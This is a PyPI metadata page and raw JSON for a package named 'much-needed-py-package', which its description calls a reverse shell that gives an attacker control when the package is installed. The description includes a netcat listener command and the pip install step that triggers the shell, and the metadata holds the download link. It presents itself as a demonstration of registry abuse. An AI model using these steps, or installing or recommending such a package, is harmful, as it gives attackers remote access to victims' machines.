much-needed-py-package


Namemuch-needed-py-package JSON
Version 0.1 PyPI version JSON
download
home_pagehttps://github.com/The-Robin-Hood/pip-remote-access
SummaryTo Show the vulnerability of the system
upload_time2023-04-09 06:11:13
maintainer
docs_urlNone
authorThe-Robin-Hood (Ansari)
requires_python
license
keywords python vulnerability remoteaccess sockets
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # Explanation:

This is Simple Python Reverse Shell module.
It is show how one can write a exploit and upload a malicious code to pyorg.
If installed how the attacker can get over your machine.

1. First Listen on 1234 port with netcat
`nc -lvp 1234`

2. Install the package 
`pip install pip-remote-access`

#### Demo :
<a href=https://youtu.be/NOoJItXU9ps>
<img src="https://media4.giphy.com/media/GlXNuhLEjIUTAfIVpC/giphy.gif?cid=ecf05e47v0qmxkcev5dyurr35agj868z9j9nt3oglw2ed0k3&rid=giphy.gif&ct=s" width="100" height="50"/>
</a>

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/The-Robin-Hood/pip-remote-access",
    "name": "much-needed-py-package",
    "maintainer": "",
    "docs_url": null,
    "requires_python": "",
    "maintainer_email": "",
    "keywords": "python,vulnerability,remoteaccess,sockets",
    "author": "The-Robin-Hood (Ansari)",
    "author_email": "",
    "download_url": "https://files.pythonhosted.org/packages/ae/35/b500ea766cfe2fb09a03dac3150edf8311723d4f3d49694e2bd274256524/much_needed_py_package-0.1.tar.gz",
    "platform": null,
    "description": "# Explanation:\n\nThis is Simple Python Reverse Shell module.\nIt is show how one can write a exploit and upload a malicious code to pyorg.\nIf installed how the attacker can get over your machine.\n\n1. First Listen on 1234 port with netcat\n`nc -lvp 1234`\n\n2. Install the package \n`pip install pip-remote-access`\n\n#### Demo :\n<a href=https://youtu.be/NOoJItXU9ps>\n<img src=\"https://media4.giphy.com/media/GlXNuhLEjIUTAfIVpC/giphy.gif?cid=ecf05e47v0qmxkcev5dyurr35agj868z9j9nt3oglw2ed0k3&rid=giphy.gif&ct=s\" width=\"100\" height=\"50\"/>\n</a>\n",
    "bugtrack_url": null,
    "license": "",
    "summary": "To Show the vulnerability of the system",
    "version": "0.1",
    "split_keywords": [
        "python",
        "vulnerability",
        "remoteaccess",
        "sockets"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "ae35b500ea766cfe2fb09a03dac3150edf8311723d4f3d49694e2bd274256524",
                "md5": "e6e6ce6c85b028baa638f83fda7c9f6a",
                "sha256": "0eaa249459564176204a903fe040e62bbf7a8df0405942ca2943c7bef3ca14ef"
            },
            "downloads": -1,
            "filename": "much_needed_py_package-0.1.tar.gz",
            "has_sig": false,
            "md5_digest": "e6e6ce6c85b028baa638f83fda7c9f6a",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 3536,
            "upload_time": "2023-04-09T06:11:13",
            "upload_time_iso_8601": "2023-04-09T06:11:13.146048Z",
            "url": "https://files.pythonhosted.org/packages/ae/35/b500ea766cfe2fb09a03dac3150edf8311723d4f3d49694e2bd274256524/much_needed_py_package-0.1.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-04-09 06:11:13",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "github_user": "The-Robin-Hood",
    "github_project": "pip-remote-access",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "lcname": "much-needed-py-package"
}
        
Elapsed time: 0.05296s